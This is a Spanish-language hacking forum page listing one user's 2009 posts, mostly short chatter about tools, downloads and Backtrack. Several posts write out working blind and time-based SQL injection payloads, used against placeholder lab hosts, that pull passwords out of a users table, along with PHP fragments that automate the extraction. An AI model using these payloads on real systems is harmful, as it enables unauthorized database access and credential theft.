Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - berz3k

Páginas 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
#131
Nivel Web / Re: SqlInyection Tools JDA v1.0(beta) by Jbyte version 2009
18 Febrero 2009, 03:41 AM
Muy sencilla la tool, pero con muchas fallas

a) Romple el programa si son mas de 12 campos (no siempre)
c) Siempre hay que ir al menu de "Nueva Injeccion" para iniciar otra nueva.
d) Injection a ciegas?

PD: Se puede mejorar bastante.

-berz3k.

PD: Moderador moverlo a Bug Exploits -> Nivel Web

#132
Hacking / Re: Certified Penetration Testing Specialist
17 Febrero 2009, 19:55 PM
@Bht Sata

Avisa cuando esten listas las descargas ese RP realmente s0x.

-berz3k.
#133
Nivel Web / Re: Múltiples fallas en Joomla 1.5.9
13 Febrero 2009, 20:20 PM
@alakentu, la gran magia del

Código [Seleccionar]

jexit(JText::_('JINVALID_TOKEN'));


-berz3k

PD: Voy a probar el fix
#134
Nivel Web / Re: Caso #01 : Blind SQL Inyection Con Descarga Forzada.
13 Febrero 2009, 19:40 PM
Es verdad mi QUERY es un blind normal via GET + ASCII etc, mas no estoy utlizando la injection via "Content-Disposition:"

Código [Seleccionar]

HTTP/1.1 200 OK
Server: test
content-disposition: attachment; filename=test.html <- AQUI INJECTION
Content-length: 16
Content-Type: application/octet-strea


configurare algun ejemplo de descarga forzada en mi LAB, mmm pero para ello necesito un ejemplo real y así observare mejor los detalles OzX

a) Estoy funcionara tanto para win32 como Linux? si no es así, sigamos con el HILO y posteando mas pruebas.
b) Estoy mirando los archivos configs para Linux  y win32 para crear un HEADER que force el CONTENT-DISPOSITION, OzX o si lo tenes ya ahorrarme el trabajo XD

mandame un msg private please!


-berz3k.

#135
Hacking / Re: Certified Penetration Testing Specialist
13 Febrero 2009, 19:26 PM
Joder llevo esperando mas de 15 dias, no termino de bajar grrr, me urge una cuenta RP premium :-(

-berz3k.
#136
Nivel Web / Re: usa.kaspersky.com hacked … full database acces , sql injection
13 Febrero 2009, 10:17 AM
Joder! , como que kaspersky hacked? mmmm bueno me tranquilizo por que no uso AV, pero que no jodan! via SQLi XD

-berz3k.
#137
Nivel Web / Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
11 Febrero 2009, 08:11 AM
@OzX

Yep. tambien elimine los "nulls" no necesarios, algo me falta..., ando metido en muchas cosas, espero fixear parte de tu code en esta semana, seguramente me lo fixeas antes tu XD, es el mismo proposito pero sin usar el ASCII(substring etc etc) ya que tomara los arrays de tu code, que previamente haz declarado para MAYUSCULAS, MINUSCULAS, chars etc.

-berz3k.
#138
Nivel Web / Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas
10 Febrero 2009, 21:53 PM
Me gusta tu code PHP te ha quedado muy wuapo, sin embargo estoy trasteando cada vez mas en PHP, ahora el string a testear es el siguiente (manualmente) :

Código [Seleccionar]

http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=95
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=96
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=97


Para solo cuestiones de prueba y ver su funcionamiento en PHP a traves de tu code he intentado algunas cosas, vaya que lo tengo hecho en PERL y me funciona correctamente, pero me estoy enamorando de PHP por su facilidad de programar XD

Segun yo, y solo para pruebas podria ser:
Código [Seleccionar]

$source = GET("http://x.x.x.x/blind.php?id=1+UNION+SELECT+IF+(SUBSTRING(group_concat(user,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))),null)+from+users+limit+0,1/*");


o Tambien
Código [Seleccionar]

$source = GET("http://x.x.x.x/blind.php?id=1+UNION+SELECT+IF+(SUBSTRING(group_concat(user,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))))+from+users+limit+0,1/*");


Mmm algo anda mal, probare mas tarde, ideas OzX?

Ejempo TABLA
Código [Seleccionar]

+++++++++++++++++++++++++++++++++++++++++
| users |
+++++++++++++++++++++++++++++++++++++++++
| id |      name | password |
+++++++++++++++++++++++++++++++++++++++++
|  1 | administrator | 1234%&_ |
|  2 | |
|  3 | |
+++++++++++++++++++++++++++++++++++++++++


Aunque podria agregar la funcion ASCII(SUBSTRING etc etc)+from+users, pero no tendria caso los arrays que declaro OzX.

-berz3k.







#139
Nivel Web / Re: Caso #01 : Blind SQL Inyection Con Descarga Forzada.
10 Febrero 2009, 20:12 PM
@OzX

Probando el script que haz enviado no me va, mi string manual es este:

Código [Seleccionar]

http://1.1.1.1/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),2,1))=50
http://1.1.1.1/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),2,1))=51
http://1.1.1.1/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),2,1))=52
[/snip...]



Var dentro del code quedo así (algo falta):

Código [Seleccionar]

$url="http://1.1.1.1/blind.php?id=1+AND+ascii(substring((".$sql."),".$substring.",1))=".$ascii[$x];


Ejecucion:

Código [Seleccionar]

C:\>php -f blind-forzado.php


-berz3k.

#140
Hacking / Re: Backtrack 4 beta
10 Febrero 2009, 19:27 PM
Mmmm a de ser un FAKE, aun asi ya lo estoy descargando.

-berz3k.
Páginas 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30